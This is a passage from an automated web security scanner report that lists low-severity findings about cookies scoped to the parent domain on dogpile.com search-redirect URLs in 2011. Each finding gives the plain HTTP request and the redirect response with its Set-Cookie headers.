Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:43 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:43 GMT
Connection: close
Content-Length: 250

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/MLB%20Schedule/1/107/RightNav/Relevance/iq=true/zoom=off/_iceUrlFla
...[SNIP]...

6.76. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=fc2a1da3f8b6425386d4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:03 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:03 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:03 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%202010%20Schedule/1/302363/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=fc2a1da3f8b6425386d4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:03 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:03 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:03 GMT
Connection: close
Content-Length: 267

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%202010%20Schedule/1/302363/RightNav/Relevance/iq=true/zoom=off/
...[SNIP]...

6.77. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=3fbd95b8ce29448a857dc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:03 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:03 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:03 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Baseball%20Schedules/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=3fbd95b8ce29448a857dc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:03 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:03 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:03 GMT
Connection: close
Content-Length: 272

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Baseball%20Schedules/1/302362/RightNav/Relevance/iq=true/zoom
...[SNIP]...

6.78. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=b0b870a4bed548babaf1c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:11 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:11 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:11 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Network%201!2F1!2F09%20Schedule/1/302360/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=b0b870a4bed548babaf1c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:11 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:11 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:11 GMT
Connection: close
Content-Length: 283

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Network%201!2F1!2F09%20Schedule/1/302360/RightNav/Relevance/i
...[SNIP]...

6.79. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=e68ff97dd2e54acf880ac16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:25 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:25 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Network%20Schedule/1/302364/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=e68ff97dd2e54acf880ac16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:25 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:25 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:25 GMT
Connection: close
Content-Length: 270

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Network%20Schedule/1/302364/RightNav/Relevance/iq=true/zoom=o
...[SNIP]...

6.80. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=f1ca76c757384245b14ec16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Rumors/1/302358/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=f1ca76c757384245b14ec16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:49 GMT
Connection: close
Content-Length: 258

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Rumors/1/302358/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_i
...[SNIP]...

6.81. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=74fe018864fa485593ecc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:57 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:57 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Scores/1/302359/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=74fe018864fa485593ecc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:57 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:56 GMT
Connection: close
Content-Length: 258

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Scores/1/302359/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_i
...[SNIP]...

6.82. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=9977e3ed3c924de3b38fc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:13 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:13 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Standings/1/302361/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=9977e3ed3c924de3b38fc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:13 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:13 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:13 GMT
Connection: close
Content-Length: 261

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Standings/1/302361/RightNav/Relevance/iq=true/zoom=off/qlnk=1
...[SNIP]...

6.83. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=cb5812815a1b48de81bfc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:07 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:07 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:07 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Trade%20Rumors/1/302357/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=cb5812815a1b48de81bfc16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:07 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:07 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:06 GMT
Connection: close
Content-Length: 266

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Mlb%20Trade%20Rumors/1/302357/RightNav/Relevance/iq=true/zoom=off/q
...[SNIP]...

6.84. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:32 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:32 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20CEO%20Elephant/1/393/TopNavigation/Relevance/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:32 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:31 GMT
Connection: close
Content-Length: 260

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/Go%20Daddy%20CEO%20Elephant/1/393/TopNavigation/Relevance/zoom=off/
...[SNIP]...

6.85. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_rss/ws/results/Web/MLB%20Schedule/1/393/TopNavigation/Relevance/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
